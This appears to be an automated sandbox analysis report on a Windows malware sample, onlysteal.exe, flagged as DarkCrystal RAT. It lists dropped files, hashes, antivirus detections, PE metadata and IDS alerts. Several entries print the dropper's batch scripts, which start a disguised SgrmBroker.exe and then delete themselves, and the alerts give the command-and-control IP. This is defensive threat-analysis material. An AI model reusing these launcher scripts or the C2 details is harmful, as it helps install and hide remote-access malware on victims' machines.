                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\1dc23k5BXS.bat"
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):230
                                    Entropy (8bit):5.070001010282303
                                    Encrypted:false
                                    SSDEEP:6:hCijTg3Nou1SV+DE1WD5um0KOZG1N723f6:HTg9uYDEo3PaC
                                    MD5:4BCA9CFEA3C9528BE5ACE2C878BC4D41
                                    SHA1:9EB7E5954AC79610A5BF91D0D50BB18D0E1B4512
                                    SHA-256:39C08132D24AB6133A54341873867B120E6009E2E158A8E9C1DEB5FB42427ADD
                                    SHA-512:27694EA4CAB22CA4867D82E3C39DB37E2EB0C24848901BE9E6C74E6EC6A39F3938F02C3BBC4F627F907643FCF3A9B62A5E1B0C36D40722CF75A9C81BB464759C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Y6Uf3masa9.bat"
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.133660689688185
                                    Encrypted:false
                                    SSDEEP:3:fBVGe0JD:5kLJD
                                    MD5:50470D25BBBF9B8EFC99335B7E06540C
                                    SHA1:E1C87FBC4C383E1EFABD7AB413BFEB6DACB6A162
                                    SHA-256:51101EBFDA97A87D73B13A0E7DFB4F34CE6B5A64EBDA5F65FAAE062EE3BEF904
                                    SHA-512:9A9D445E11B21FAFC414AA1E455D1FE018E81F2CE2AAF3BCA57DE07C498021DBCA498828A0B017529A5920FC44CD8B339C60C13ACFA4228C9DEEC666FE248E77
                                    Malicious:false
                                    Preview:4KGgg7CDuuhV2Y8dDKQ1yLCCB
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):182
                                    Entropy (8bit):5.1026033485626225
                                    Encrypted:false
                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1WDEQQ0RFofD6CvbBktKcKZG1N+E2J5xAIGmsJ4RK:hCRLuVFOOr+DE1WD5um0KOZG1N723f8
                                    MD5:9679E1604C5863446A9181D4AB5AE969
                                    SHA1:486B0454D359B9533ADA510AD6FCA6579F8347B7
                                    SHA-256:D2355B2F452D8CF5667A9BD7B01E41265418E2E8D12FB82D49ADB76C4C7ED5D4
                                    SHA-512:563D96220E85CD230AFCB9A08755DC6F9FA8C8AB3B19D488F5169AD34308AFF092A4C6471A70116483EDA7E088721AC11C5A8140B326BF4652E77AD9307265F9
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\fmCyxdZe80.bat"
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):3.8594705707972508
                                    Encrypted:false
                                    SSDEEP:3:hX37HVn:nn
                                    MD5:F1C48EE3BC57DA0E8CB447C1A6FEF6D4
                                    SHA1:A8BC58F989C4070BF4B12F2ECAA2053AD8BBE69A
                                    SHA-256:AF5D3F8ECF9476750B152153E03B75DC6AAAA42CDCD9AB5FC9B110626E9A01F1
                                    SHA-512:2CD73A36B35DFB18A716162B5E5546B0B2C4D31A1BF17FBA9839C85C5BE96DD16C863AE581F4F3D28222F3F0FD1FB0995C72131C33A0E384A0FDEA45F0BC21DD
                                    Malicious:false
                                    Preview:03NXXhs5T9XXpeBeleebeuHnD
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.403856189774723
                                    Encrypted:false
                                    SSDEEP:3:ktyrSqhZQn:YQSQu
                                    MD5:91A1E01BB2B06C5B6A398F0AD81A9538
                                    SHA1:AC4825EA279F45D3C17FE719B753B92A93686833
                                    SHA-256:AAFCDD6A0973A194815311495B944D8CC9596D3ABD30665CA67F716EB2EAEE4D
                                    SHA-512:41058D42F6EE41828F68311A4B4326752BDBFD9372135D6842748BBF780933D85200276499D91350DE3B6DE8F18ABFE0DDF3716A33685FA90A5F1F8C3CA3EAB1
                                    Malicious:false
                                    Preview:ERzwDsAAzWlJtjV7OBDGn39a5
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.483856189774723
                                    Encrypted:false
                                    SSDEEP:3:39cIKnEi2hXtE:n8Z2rE
                                    MD5:79D2ECEE4509E5BB6E9679A72B6C7E33
                                    SHA1:60C8B975A23BCDABC409A98E507AE57EEEF84680
                                    SHA-256:7CEDC7710CF78C739C0A66D2B41AC558EACAD715227E3682C11E7F80F6FA6AB7
                                    SHA-512:435997ABEA35C622C821B0A4B4BAFD3C54F49BCAEA8474DEBCF91685DBE52F2B82E704CF6A4184816E915E25BA5B472AA925DA3C038203F920B6ADFFA068DCB7
                                    Malicious:false
                                    Preview:fECwzy9mjWBa9vSFkcY3brRxa
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):182
                                    Entropy (8bit):5.106219329013348
                                    Encrypted:false
                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1WDEQQ0RFofD6CvbBktKcKZG1N+E2J5xAIJKvK:hCRLuVFOOr+DE1WD5um0KOZG1N723fJL
                                    MD5:A62E6D4EC7668063EEB7BFBBF7167A83
                                    SHA1:6C07B071FEBE0EEB98DE6C15249333F001BF8DF4
                                    SHA-256:1D822827F71E0B8189A534CEDC270EE17BBE534A90C530BE0D8628BC7C746A11
                                    SHA-512:B6A73E6E72B3512E6AA6B9409D8B1B772286009F5E8B6BC1BB5CC46F93230B6C2A95B286A52487AE36447C86E4290D22745300CB930375DB7FD1FA4EC62415CD
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\szcAPjpm25.bat"
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):230
                                    Entropy (8bit):5.1192687760382904
                                    Encrypted:false
                                    SSDEEP:6:hCijTg3Nou1SV+DE1WD5um0KOZG1N723fM:HTg9uYDEo3PaU
                                    MD5:5C515DEB3DF8E8340550BFFF1688520C
                                    SHA1:B353B19AF5E7B3224087B9DFFDCD145878A90D9B
                                    SHA-256:807886272ED9A5655814289F6DA742471F4C68E9C5F15C7D5D6318726F7AC188
                                    SHA-512:09FE9B187925AE38D6DF32466A33072DE394C781A639FD85F48482E5D90A7425E9C4B968DC5672B23E35FB2437A428B8D97BDF411BEEF68CFEECB474D97C194F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\zuhvZR4ed0.bat"
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):69632
                                    Entropy (8bit):5.932541123129161
                                    Encrypted:false
                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 50%
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Process:C:\Windows\System32\w32tm.exe
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):151
                                    Entropy (8bit):4.757812247066604
                                    Encrypted:false
                                    SSDEEP:3:VLV993J+miJWEoJ8FXrX9Qvt8VLUVJ8XKvpKM8Q0HKvj:Vx993DEUQtdVLUVJgLZs
                                    MD5:303E501CC86F7F9A740D6BDECAA03737
                                    SHA1:351C09FA814208751E530BD008811025B8999136
                                    SHA-256:E9C31C3A5206187AFBC0960D809A57BEB8FC6C2BBA4FA70944079E88BB973D57
                                    SHA-512:9FBD6230BE512FE96EF73684D16309BFC146A46771B86C9CDB5B8F4826B78E5BF38A31D1CC883C0D771139A3AE9445F91EABF26C1CCB302AFFB3FF98C58DC20C
                                    Malicious:false
                                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 03/01/2025 05:10:10..05:10:10, error: 0x80072746.05:10:15, error: 0x80072746.
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.114565984261988
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:onlysteal.exe
                                    File size:1'011'382 bytes
                                    MD5:8f81ac89b9f6dbccf07a86af59faa6ba
                                    SHA1:0d97a27bacaae103f2f15637f623d3d13a568d91
                                    SHA256:766b497466955f86e0d049c25aa6f99880d230acbb8d1141408fe0e8169fb46a
                                    SHA512:452c04ec647dd84123ffb84f1ff37aef81057edf0c1a069113d0b1d89f2462c373301aa84355d0fafd8bb6c4b3d4b6bf580952f29189157edaea376711be16ea
                                    SSDEEP:24576:2TbBv5rUyXVUxJMVI3SyKnUh9E1bm67+f:IBJcJMrEh9mbc
                                    TLSH:9E2518107AEA0136F1B6ABB155E1695E86BDF9F3B7168FCE304082CA87167C0CD61736
                                    Icon Hash:1515d4d4442f2d2d
                                    Entrypoint:0x41f530
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                    Instruction
                                    call 00007FA8A07F322Bh
                                    jmp 00007FA8A07F2B3Dh
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    push esi
                                    push dword ptr [ebp+08h]
                                    mov esi, ecx
                                    call 00007FA8A07E5987h
                                    mov dword ptr [esi], 004356D0h
                                    mov eax, esi
                                    pop esi
                                    pop ebp
                                    retn 0004h
                                    and dword ptr [ecx+04h], 00000000h
                                    mov eax, ecx
                                    and dword ptr [ecx+08h], 00000000h
                                    mov dword ptr [ecx+04h], 004356D8h
                                    mov dword ptr [ecx], 004356D0h
                                    ret
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    push esi
                                    mov esi, ecx
                                    lea eax, dword ptr [esi+04h]
                                    mov dword ptr [esi], 004356B8h
                                    push eax
                                    call 00007FA8A07F5FCFh
                                    test byte ptr [ebp+08h], 00000001h
                                    pop ecx
                                    je 00007FA8A07F2CCCh
                                    push 0000000Ch
                                    push esi
                                    call 00007FA8A07F2289h
                                    pop ecx
                                    pop ecx
                                    mov eax, esi
                                    pop esi
                                    pop ebp
                                    retn 0004h
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 0Ch
                                    lea ecx, dword ptr [ebp-0Ch]
                                    call 00007FA8A07E5902h
                                    push 0043BEF0h
                                    lea eax, dword ptr [ebp-0Ch]
                                    push eax
                                    call 00007FA8A07F5A89h
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 0Ch
                                    lea ecx, dword ptr [ebp-0Ch]
                                    call 00007FA8A07F2C48h
                                    push 0043C0F4h
                                    lea eax, dword ptr [ebp-0Ch]
                                    push eax
                                    call 00007FA8A07F5A6Ch
                                    int3
                                    jmp 00007FA8A07F7507h
                                    int3
                                    int3
                                    int3
                                    int3
                                    push 00422900h
                                    push dword ptr fs:[00000000h]
                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                                    PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                                    RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
                                    RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
                                    RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
                                    RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
                                    RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
                                    RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
                                    RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
                                    RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
                                    RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
                                    RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
                                    RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
                                    RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
                                    RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
                                    RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
                                    RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
                                    RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
                                    RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
                                    RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
                                    RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
                                    RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
                                    RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
                                    RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
                                    RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
                                    RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
                                    RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-03T09:10:33.122779+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.6 | 49746 | 185.216.71.25 | 80 | TCP
2025-01-03T09:11:00.557774+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.6 | 49377 | 185.216.71.25 | 80 | TCP
2025-01-03T09:11:59.621339+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.6 | 49431 | 185.216.71.25 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
